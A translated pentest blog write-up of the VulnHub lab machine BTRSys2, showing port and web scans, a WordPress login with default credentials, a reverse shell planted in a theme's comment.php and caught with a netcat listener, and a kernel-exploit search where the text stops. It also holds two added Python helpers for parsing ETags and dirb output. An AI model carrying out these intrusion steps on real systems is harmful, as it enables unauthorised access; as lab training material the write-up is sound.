Want to try bug bounties

I keep saying "tempest" when I mean "pentest"

Hoping today's effort leads somewhere down the road. Misuse strictly prohibited.

vulnhub BTRSys2 v2.1 notes

BTRSys2

The ovf file extracted from the Google Drive download did not work for me.
The ovf from the vulnhub.com download worked fine.
Getting an IP did not work either, so at boot I selected "recovery mode" and then "network Enable networking", which brought the link up.

 Service enumeration

# nmap -p- 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:21 EDT
Nmap scan report for 10.10.10.13
Host is up (0.00015s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 17.35 seconds
# nmap -p21,22,80 -sV --version-all 10.10.10.13
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-11 07:22 EDT
Nmap scan report for 10.10.10.13
Host is up (0.00051s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 08:00:27:FC:08:3F (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.90 seconds

Points of interest

Details

[port 21] ftp vsftpd 3.0.3

# searchsploit vsftpd
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
----------------------------------------------------------------------------- ----------------------------------------
vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption               | exploits/linux/dos/5814.pl
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)               | exploits/windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)               | exploits/windows/dos/31819.pl
vsftpd 2.3.2 - Denial of Service                                             | exploits/linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                       | exploits/unix/remote/17491.rb
----------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

Nothing in particular.

# ftp 10.10.10.13
Connected to 10.10.10.13.
220 (vsFTPd 3.0.3)
Name (10.10.10.13:root): 
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> ls
530 Please login with USER and PASS.

Login required, so moving on.

[port 22] ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)

I have seen this version before too, but as I recall the only exploit for it was username enumeration, and its accuracy was low.
Done.

[port 80] http Apache httpd 2.4.18 (Ubuntu)

# nikto -h 10.10.10.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.13
+ Target Hostname:    10.10.10.13
+ Target Port:        80
+ Start Time:         2020-05-11 07:30:36 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 51, size: 54e208f152180, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7865 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time:           2020-05-11 07:31:40 (GMT-4) (64 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

robots.txt looks interesting.
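
One line in the nikto output above deserves a second look before moving on. Nikto 2.1.6 labels the ETag on / as "inode: 51, size: 54e208f152180, mtime: gzip" because it assumes the legacy three-field inode-size-mtime layout. Apache 2.4 defaults to `FileETag MTime Size`, which produces size-mtime (both hex, mtime in microseconds since the epoch), and mod_deflate appends -gzip. So 51 is the size (0x51 = 81 bytes, the same SIZE:81 dirb reports for index.html below), 54e208f152180 is the modification time (27 April 2017), and no inode is exposed: the inode-leak finding is a false positive on this host. The Python below is an added example, not part of the original post, that decodes both Apache layouts; it assumes only the two default Apache formats described here and treats any trailing non-hex field as a content-encoding suffix.

```python
# Added example (not from the original post): decode an Apache FileETag value.
#
# Assumption: the ETag follows one of Apache's own layouts only.
#   FileETag MTime Size        (2.4 default)  -> "<size>-<mtime>"
#   FileETag INode MTime Size  (2.2 default)  -> "<inode>-<size>-<mtime>"
# Every field is hex; mtime is microseconds since the Unix epoch. mod_deflate
# appends a non-hex suffix such as "-gzip". Nikto 2.1.6 assumes the
# three-field layout and therefore mislabels a two-field ETag.
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional

_HEX = re.compile(r"[0-9a-fA-F]+")


@dataclass(frozen=True)
class ApacheETag:
    inode: Optional[int]   # None unless FileETag includes INode
    size: int              # file size in bytes
    mtime_us: int          # last-modified time, microseconds since the epoch
    suffix: Optional[str]  # e.g. "gzip" from mod_deflate

    @property
    def mtime(self) -> datetime:
        secs, us = divmod(self.mtime_us, 1_000_000)
        return datetime.fromtimestamp(secs, tz=timezone.utc).replace(microsecond=us)

    def leaks_inode(self) -> bool:
        return self.inode is not None


def _is_hex(s: str) -> bool:
    return _HEX.fullmatch(s) is not None


def parse_apache_etag(etag: str) -> ApacheETag:
    """Parse a strong or weak (W/) Apache ETag header value."""
    value = etag.strip()
    if value.startswith("W/"):
        value = value[2:]
    value = value.strip('"')
    fields = value.split("-")
    suffix = None
    if len(fields) > 1 and not _is_hex(fields[-1]):
        suffix = fields.pop()          # content-encoding marker, e.g. "gzip"
    if not fields or not all(_is_hex(f) for f in fields):
        raise ValueError(f"not an Apache FileETag value: {etag!r}")
    nums = [int(f, 16) for f in fields]
    if len(nums) == 2:                 # size-mtime (FileETag MTime Size)
        return ApacheETag(None, nums[0], nums[1], suffix)
    if len(nums) == 3:                 # inode-size-mtime (FileETag INode MTime Size)
        return ApacheETag(nums[0], nums[1], nums[2], suffix)
    raise ValueError(f"unexpected field count in ETag: {etag!r}")


def describe(etag: str) -> str:
    """One-line human summary, flagging whether an inode is actually exposed."""
    e = parse_apache_etag(etag)
    parts = [f"size={e.size} bytes", f"mtime={e.mtime.isoformat()}"]
    parts.append(f"inode={e.inode}" if e.leaks_inode() else "inode=not exposed")
    if e.suffix:
        parts.append(f"suffix={e.suffix}")
    return ", ".join(parts)


if __name__ == "__main__":
    # The value nikto reported for / on 10.10.10.13, reassembled from its output.
    print(describe('"51-54e208f152180-gzip"'))
```

To check the raw header yourself, `curl -sI http://10.10.10.13/ | grep -i etag` shows the value before nikto splits it. Only an explicit `FileETag INode ...` directive, or an Apache 2.2 default, puts an inode in the ETag; on 2.4 the two-field form is the normal, non-leaking case.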

# dirb http://10.10.10.13

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon May 11 07:32:16 2020
URL_BASE: http://10.10.10.13/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.13/ ----
+ http://10.10.10.13/index.html (CODE:200|SIZE:81)                                                                   
==> DIRECTORY: http://10.10.10.13/javascript/                                                                        
+ http://10.10.10.13/LICENSE (CODE:200|SIZE:1672)                                                                    
+ http://10.10.10.13/robots.txt (CODE:200|SIZE:1451)                                                                 
+ http://10.10.10.13/server-status (CODE:403|SIZE:299)                                                               
==> DIRECTORY: http://10.10.10.13/upload/                                                                            
==> DIRECTORY: http://10.10.10.13/wordpress/                                                                         
                                                                                                                     
---- Entering directory: http://10.10.10.13/javascript/ ----
==> DIRECTORY: http://10.10.10.13/javascript/jquery/                                                                 
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/                                                                    
==> DIRECTORY: http://10.10.10.13/upload/admins/                                                                     
==> DIRECTORY: http://10.10.10.13/upload/framework/                                                                  
==> DIRECTORY: http://10.10.10.13/upload/include/                                                                    
+ http://10.10.10.13/upload/index.php (CODE:500|SIZE:67)                                                             
==> DIRECTORY: http://10.10.10.13/upload/languages/                                                                  
==> DIRECTORY: http://10.10.10.13/upload/media/                                                                      
==> DIRECTORY: http://10.10.10.13/upload/modules/                                                                    
==> DIRECTORY: http://10.10.10.13/upload/page/                                                                       
==> DIRECTORY: http://10.10.10.13/upload/search/                                                                     
==> DIRECTORY: http://10.10.10.13/upload/temp/                                                                       
==> DIRECTORY: http://10.10.10.13/upload/templates/                                                                  
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/ ----
+ http://10.10.10.13/wordpress/index.php (CODE:301|SIZE:0)                                                           
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/                                                                
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/                                                              
==> DIRECTORY: http://10.10.10.13/wordpress/wp-includes/                                                             
+ http://10.10.10.13/wordpress/xmlrpc.php (CODE:200|SIZE:42)                                                         
                                                                                                                     
---- Entering directory: http://10.10.10.13/javascript/jquery/ ----
+ http://10.10.10.13/javascript/jquery/jquery (CODE:200|SIZE:284394)                                                 
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/account/ ----
==> DIRECTORY: http://10.10.10.13/upload/account/css/                                                                
+ http://10.10.10.13/upload/account/index.php (CODE:500|SIZE:67)                                                     
==> DIRECTORY: http://10.10.10.13/upload/account/templates/                                                          
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/access/                                                              
==> DIRECTORY: http://10.10.10.13/upload/admins/addons/                                                              
==> DIRECTORY: http://10.10.10.13/upload/admins/admintools/                                                          
==> DIRECTORY: http://10.10.10.13/upload/admins/groups/                                                              
+ http://10.10.10.13/upload/admins/index.php (CODE:500|SIZE:67)                                                      
==> DIRECTORY: http://10.10.10.13/upload/admins/interface/                                                           
==> DIRECTORY: http://10.10.10.13/upload/admins/languages/                                                           
==> DIRECTORY: http://10.10.10.13/upload/admins/login/                                                               
==> DIRECTORY: http://10.10.10.13/upload/admins/logout/                                                              
==> DIRECTORY: http://10.10.10.13/upload/admins/media/                                                               
==> DIRECTORY: http://10.10.10.13/upload/admins/modules/                                                             
==> DIRECTORY: http://10.10.10.13/upload/admins/pages/                                                               
==> DIRECTORY: http://10.10.10.13/upload/admins/preferences/                                                         
==> DIRECTORY: http://10.10.10.13/upload/admins/profiles/                                                            
==> DIRECTORY: http://10.10.10.13/upload/admins/service/                                                             
==> DIRECTORY: http://10.10.10.13/upload/admins/settings/                                                            
==> DIRECTORY: http://10.10.10.13/upload/admins/start/                                                               
==> DIRECTORY: http://10.10.10.13/upload/admins/support/                                                             
==> DIRECTORY: http://10.10.10.13/upload/admins/templates/                                                           
==> DIRECTORY: http://10.10.10.13/upload/admins/users/                                                               
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/framework/ ----
==> DIRECTORY: http://10.10.10.13/upload/framework/functions/                                                        
+ http://10.10.10.13/upload/framework/index.php (CODE:500|SIZE:67)                                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/include/ ----
+ http://10.10.10.13/upload/include/index.php (CODE:500|SIZE:67)                                                     
==> DIRECTORY: http://10.10.10.13/upload/include/yui/                                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/languages/ ----
+ http://10.10.10.13/upload/languages/index.php (CODE:500|SIZE:67)                                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/media/ ----
+ http://10.10.10.13/upload/media/index.php (CODE:500|SIZE:67)                                                       
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/ ----
+ http://10.10.10.13/upload/modules/admin.php (CODE:500|SIZE:67)                                                     
+ http://10.10.10.13/upload/modules/index.php (CODE:500|SIZE:67)                                                     
==> DIRECTORY: http://10.10.10.13/upload/modules/news/                                                               
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/                                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/page/ ----
+ http://10.10.10.13/upload/page/index.php (CODE:500|SIZE:67)                                                        
==> DIRECTORY: http://10.10.10.13/upload/page/posts/                                                                 
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/search/ ----
+ http://10.10.10.13/upload/search/index.php (CODE:500|SIZE:67)                                                      
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/temp/ ----
+ http://10.10.10.13/upload/temp/index.php (CODE:500|SIZE:67)                                                        
==> DIRECTORY: http://10.10.10.13/upload/temp/search/                                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/templates/ ----
==> DIRECTORY: http://10.10.10.13/upload/templates/blank/                                                            
+ http://10.10.10.13/upload/templates/index.php (CODE:500|SIZE:67)                                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/ ----
+ http://10.10.10.13/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                  
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/css/                                                            
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/images/                                                         
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/includes/                                                       
+ http://10.10.10.13/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                  
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/js/                                                             
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/maint/                                                          
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/network/                                                        
==> DIRECTORY: http://10.10.10.13/wordpress/wp-admin/user/                                                           
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-content/ ----
+ http://10.10.10.13/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/plugins/                                                      
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/themes/                                                       
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/upgrade/                                                      
==> DIRECTORY: http://10.10.10.13/wordpress/wp-content/uploads/                                                      
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/account/css/ ----
+ http://10.10.10.13/upload/account/css/index.php (CODE:500|SIZE:67)                                                 
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/account/templates/ ----
+ http://10.10.10.13/upload/account/templates/index.php (CODE:500|SIZE:67)                                           
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/access/ ----
+ http://10.10.10.13/upload/admins/access/index.php (CODE:500|SIZE:67)                                               
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/addons/ ----
+ http://10.10.10.13/upload/admins/addons/index.php (CODE:500|SIZE:67)                                               
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/admintools/ ----
+ http://10.10.10.13/upload/admins/admintools/index.php (CODE:500|SIZE:67)                                           
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/groups/ ----
+ http://10.10.10.13/upload/admins/groups/index.php (CODE:500|SIZE:67)                                               
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/interface/ ----
+ http://10.10.10.13/upload/admins/interface/index.php (CODE:500|SIZE:67)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/languages/ ----
+ http://10.10.10.13/upload/admins/languages/index.php (CODE:500|SIZE:67)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/login/ ----
==> DIRECTORY: http://10.10.10.13/upload/admins/login/forgot/                                                        
+ http://10.10.10.13/upload/admins/login/index.php (CODE:500|SIZE:67)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/logout/ ----
+ http://10.10.10.13/upload/admins/logout/index.php (CODE:500|SIZE:67)                                               
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/media/ ----
+ http://10.10.10.13/upload/admins/media/index.php (CODE:500|SIZE:67)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/modules/ ----
+ http://10.10.10.13/upload/admins/modules/index.php (CODE:500|SIZE:67)                                              
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/pages/ ----
+ http://10.10.10.13/upload/admins/pages/index.php (CODE:500|SIZE:67)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/preferences/ ----
+ http://10.10.10.13/upload/admins/preferences/index.php (CODE:500|SIZE:67)                                          
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/profiles/ ----
+ http://10.10.10.13/upload/admins/profiles/index.php (CODE:500|SIZE:0)                                              
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/service/ ----
+ http://10.10.10.13/upload/admins/service/index.php (CODE:500|SIZE:67)                                              
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/settings/ ----
+ http://10.10.10.13/upload/admins/settings/index.php (CODE:500|SIZE:67)                                             
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/start/ ----
+ http://10.10.10.13/upload/admins/start/index.php (CODE:500|SIZE:67)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/support/ ----
+ http://10.10.10.13/upload/admins/support/index.php (CODE:500|SIZE:67)                                              
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/templates/ ----
+ http://10.10.10.13/upload/admins/templates/index.php (CODE:500|SIZE:67)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/users/ ----
+ http://10.10.10.13/upload/admins/users/index.php (CODE:500|SIZE:67)                                                
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/framework/functions/ ----
+ http://10.10.10.13/upload/framework/functions/index.php (CODE:500|SIZE:67)                                         
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/include/yui/ ----
==> DIRECTORY: http://10.10.10.13/upload/include/yui/event/                                                          
+ http://10.10.10.13/upload/include/yui/index.php (CODE:500|SIZE:67)                                                 
+ http://10.10.10.13/upload/include/yui/README (CODE:200|SIZE:8488)                                                  
==> DIRECTORY: http://10.10.10.13/upload/include/yui/yahoo/                                                          
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/news/ ----
==> DIRECTORY: http://10.10.10.13/upload/modules/news/css/                                                           
+ http://10.10.10.13/upload/modules/news/index.php (CODE:500|SIZE:67)                                                
+ http://10.10.10.13/upload/modules/news/info.php (CODE:500|SIZE:67)                                                 
==> DIRECTORY: http://10.10.10.13/upload/modules/news/languages/                                                     
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/                                                     
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/index.php (CODE:500|SIZE:67)                                             
+ http://10.10.10.13/upload/modules/wysiwyg/info.php (CODE:500|SIZE:67)                                              
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/languages/                                                  
==> DIRECTORY: http://10.10.10.13/upload/modules/wysiwyg/templates/                                                  
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/page/posts/ ----
+ http://10.10.10.13/upload/page/posts/index.php (CODE:302|SIZE:0)                                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/temp/search/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/templates/blank/ ----
+ http://10.10.10.13/upload/templates/blank/index.php (CODE:500|SIZE:67)                                             
+ http://10.10.10.13/upload/templates/blank/info.php (CODE:500|SIZE:67)                                              
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/network/ ----
+ http://10.10.10.13/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)                                          
+ http://10.10.10.13/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)                                          
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-admin/user/ ----
+ http://10.10.10.13/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)                                             
+ http://10.10.10.13/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)                                             
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-content/plugins/ ----
+ http://10.10.10.13/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)                                        
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-content/themes/ ----
+ http://10.10.10.13/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)                                         
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/admins/login/forgot/ ----
+ http://10.10.10.13/upload/admins/login/forgot/index.php (CODE:500|SIZE:67)                                         
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/include/yui/event/ ----
+ http://10.10.10.13/upload/include/yui/event/index.php (CODE:500|SIZE:67)                                           
+ http://10.10.10.13/upload/include/yui/event/README (CODE:200|SIZE:9807)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/include/yui/yahoo/ ----
+ http://10.10.10.13/upload/include/yui/yahoo/index.php (CODE:500|SIZE:67)                                           
+ http://10.10.10.13/upload/include/yui/yahoo/README (CODE:200|SIZE:2889)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/news/css/ ----
+ http://10.10.10.13/upload/modules/news/css/index.php (CODE:500|SIZE:67)                                            
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/news/languages/ ----
+ http://10.10.10.13/upload/modules/news/languages/index.php (CODE:500|SIZE:67)                                      
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/news/templates/ ----
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/backend/                                             
+ http://10.10.10.13/upload/modules/news/templates/index.php (CODE:500|SIZE:67)                                      
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/languages/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/languages/index.php (CODE:500|SIZE:67)                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/wysiwyg/templates/ ----
+ http://10.10.10.13/upload/modules/wysiwyg/templates/index.php (CODE:500|SIZE:67)                                   
                                                                                                                     
---- Entering directory: http://10.10.10.13/upload/modules/news/templates/backend/ ----
+ http://10.10.10.13/upload/modules/news/templates/backend/index.php (CODE:500|SIZE:67)                              
                                                                                                                     
-----------------
END_TIME: Mon May 11 07:34:12 2020
DOWNLOADED: 267496 - FOUND: 71

Unusually, a dirb result with a great deal of information.
The directories of interest are mainly two: "/upload/" and "/wordpress/".
First, check "/robots.txt".
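As an added example, not part of the original writeup, a small triage of dirb output in the format printed above: it pulls out the listable directories, the endpoints answering with server errors, readable stray files and management paths, which is the grouping an exposure review would hand to the web server owner. The sample log is a constructed subset of the scan above; the regexes are assumptions about dirb's line format based on that output.

```python
import re

# Constructed sample in the dirb output format shown above (a subset of the scan, not the full log).
SAMPLE_DIRB = """\
---- Entering directory: http://10.10.10.13/wordpress/wp-content/upgrade/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
+ http://10.10.10.13/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
+ http://10.10.10.13/upload/admins/login/forgot/index.php (CODE:500|SIZE:67)
+ http://10.10.10.13/upload/include/yui/event/README (CODE:200|SIZE:9807)
==> DIRECTORY: http://10.10.10.13/upload/modules/news/templates/backend/
"""

ENTRY_RE = re.compile(r"^\+ (\S+) \(CODE:(\d+)\|SIZE:(\d+)\)")
DIRECTORY_RE = re.compile(r"^==> DIRECTORY: (\S+)")
ENTERING_RE = re.compile(r"^---- Entering directory: (\S+) ----")
LISTABLE_RE = re.compile(r"^\(!\) WARNING: Directory IS LISTABLE")


def parse_dirb(text):
    """Parse dirb output into entries (url, code, size), discovered directories and listable directories."""
    parsed = {"entries": [], "directories": [], "listable": []}
    current_dir = None  # directory named by the most recent "Entering directory" line
    for line in text.splitlines():
        line = line.rstrip()
        if m := ENTERING_RE.match(line):
            current_dir = m.group(1)
        elif LISTABLE_RE.match(line) and current_dir:
            parsed["listable"].append(current_dir)  # the warning refers to the directory just entered
        elif m := DIRECTORY_RE.match(line):
            parsed["directories"].append(m.group(1))
        elif m := ENTRY_RE.match(line):
            parsed["entries"].append((m.group(1), int(m.group(2)), int(m.group(3))))
    return parsed


def triage(parsed):
    """Group findings the way an exposure review would, so each class can be fixed at the server or app."""
    findings = {"listable": list(parsed["listable"]), "server_errors": [], "readable_files": [], "admin_paths": []}
    for url, code, size in parsed["entries"]:
        path = url.split("//", 1)[-1].split("/", 1)[-1]  # strip scheme and host
        if code >= 500:
            findings["server_errors"].append(url)  # error pages often leak config or DB details
        elif code == 200 and size > 0 and not path.endswith("index.php"):
            findings["readable_files"].append(url)  # stray vendor docs (README etc.) left readable
        if "admin" in path or "login" in path:
            findings["admin_paths"].append(url)  # management endpoints that should be access-restricted
    return findings
```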

# curl 10.10.10.13/robots.txt
Disallow: Hackers
Allow: /wordpress/


 .o+.                    :o/                                                   -o+`                
  /hh:                    shh`                                                  +hh-                
  /hh:                    shh`                         -/:                      +hh-                
  /hh:                    shh`                         +s+                      +hh-                
  /hh/............   `....shh-....   ...............`  `-`   `..............`   +hh-          ..    
  /hhyyyyyyyyyyyyy/ `syyyyyhhyyyyy. -yyyyyyyyyyyyyyy/  oys   +ssssssssssssss/   +hh-        .+yy-   
  /hh+---------/hh+  .----yhh:----  :hho------------`  yhy`  oyy------------`   +hh-      .+yys:`   
  /hh:         -hh+       shh`      :hh+               yhy`  oyy                +hh-   `.+yys/`     
  /hh:         -hh+       shh`      :hh+               yhy`  oss          `--   +hhsssssyhy/`       
  /hh:         -hh+       shh`      :hh+               yhy`  `-.          +yy.  +hho+++osyy+.       
  /hh:         -hh+       shh`      :hh+               yhy`               +yy.  +hh-    `/syy+.     
  /hho:::::::::+hh+       shh`      :hh+               yhy`  .::::::::::::oyy.  +hh-      `/yyy/`   
  :yyyyyyyyyyyyyyy:       +ys`      .yy:               oys   +sssssssssssssss`  /ys.        `/sy-   
   ```````````````         `         ``                 `     ``````````````     ``                

Nothing particularly new was gained.
Connecting to the home page again in a browser, there is a gif of something squirming.
Accessing "/upload/" gives:

Connection failed: SQLSTATE[HY000] [1049] Unknown database 'Lepton'

Is the PHP MySQL connection failing?
In any case, it seems "/upload/" cannot be explored any further.
So, check "/wordpress/".
The displayed page does not seem to load the proper WordPress design?

Log in , admin

Since there is a "Log in", I try logging in with "admin/admin".
Ah, it seems the login succeeded, so from Appearance->Editor I modify a php file that looks easy to reach.
It's a matter of preference, but I like setting the reverse shell in search.php because it's easy to follow.
The reverse shell is the pentestmonkey one I always rely on.
On Kali it is at "/usr/share/webshells/php/php-reverse-shell.php".
This time "search.php" did not work (by design?), so I modified "comment.php" for the reverse shell.

window 1

# nc -nlvp 8080
From Firefox, post a comment on any article.
window 1

Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 14:43:02 up  1:24,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$

shell getchu!

after shell getchu

kernel exploit

No suspicious files found at all, and searching cron turned up nothing notable either.
No choice, so go for a kernel exploit.

victim

$ uname -a
Linux ubuntu 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
attacker

# searchsploit ubuntu 4.4
----------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                               |  Path
                                                                             | (/usr/share/exploitdb/)
